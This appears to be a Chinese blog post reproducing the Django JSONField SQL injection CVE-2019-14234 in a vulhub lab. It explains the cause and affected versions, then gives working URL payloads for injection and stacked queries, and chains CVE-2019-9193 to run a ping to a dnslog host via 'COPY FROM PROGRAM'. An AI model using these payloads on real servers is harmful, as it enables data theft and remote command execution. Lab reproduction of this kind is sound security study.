CVE-2019-14234 Django JSONField SQL注入漏洞复现

## CVE-2019-14234 Django JSONField SQL注入漏洞复现

标签： [漏洞复现](/static/baige/06-中间件框架漏洞/DJANGO/https://www.freesion.com/tag/漏洞复现/) [安全](/static/baige/06-中间件框架漏洞/DJANGO/https://www.freesion.com/tag/安全/)

# 0x01简介

Django是一款广为流行的开源web框架，由Python编写，许多网站和app都基于Django开发。

什么是JSONField，Django是一个大而全的Web框架，其支持很多数据库引擎，包括Postgresql、Mysql、Oracle、Sqlite3等，但与Django天生为一对儿的数据库莫过于Postgresql了，Django官方也建议配合Postgresql一起使用。

相比于Mysql，Postgresql支持的数据类型更加丰富，其对JSON格式数据的支持也让这个关系型数据库拥有了NoSQL的一些特点。

# 0x02漏洞简介

该漏洞需要开发者使用了JSONField/HStoreField，且用户可控queryset查询时的键名，在键名的位置注入SQL语句。

Django通常搭配postgresql数据库，而JSONField是该数据库的一种数据类型。该漏洞的出现的原因在于Django中JSONField类的实现，Django的model最本质的作用是生成SQL语句，而在Django通过JSONField生成sql语句时，是通过简单的字符串拼接。

通过JSONField类获得KeyTransform类并生成sql语句的位置。

其中key_name是可控的字符串，最终生成的语句是

“`
WHERE (field->'[key_name]’) =’value’
1
“`

，因此可以进行SQL注入。

# 0x03影响版本

Django 主开发分支

Django 2.2.x < 2.2.4 Django 2.1.x < 2.1.11 Django 1.11.x < 1.11.23 # 0x04环境搭建 使用vulhub的docker环境搭建 vulhub下载地址：https://github.com/vulhub/vulhub cd vulhub/django/CVE-2019-14234/ docker-compose up -d  在浏览器访问http://ip:8000出现一下页面说明搭建成功  # 0x05漏洞利用 通过对代码的分析，可以知道如果在你的Django中使用了JSONField并且查询的“键名”可控，就可以进行SQL注入 访问http://ip:8000/admin 输入用户名admin ，密码a123123123  然后构造URL进行查询，payload： http://ip:8000/admin/vuln/collection/?detail__a’b=123  可以看到上图已经注入成功，并且可以看到构造的SQL语句，继续构造payload ``` http://ip:8000/admin/vuln/collection/?detail__title%27)%3d%271%27 or 1%3d1%2d%2d%20 1 ``` 由于or 1=1永为真，因此应该返回所有结果  我们结合CVE-2019-9193我们尝试进行命令注入，构造url如下 ``` http://192.168.10.195:8000/admin/vuln/collection/?detail__title')%3d'1' or 1%3d1 %3bcreate table cmd_exec(cmd_output text)--%20 1 ``` 页面结果虽然报错，但是报错原因是no results to fetch，说明我们的语句已经执行  使用dnslog检测是否可以执行命令 Dnslog网址：http://dnslog.cn/ Payload: ``` http://192.168.10.195:8000/admin/vuln/collection/?detail__title')%3d'1' or 1%3d1 %3bcopy cmd_exec FROM PROGRAM 'ping k1anij.dnslog.cn '--%20 12 ```  成功检测到流量  复现环境里的postgresql数据库docker没对外的端口映射，如果开了或者真实环境里，还可以结合msf通过CVE-2019-9193来getshell # 0x06修复方式 更新到最新版本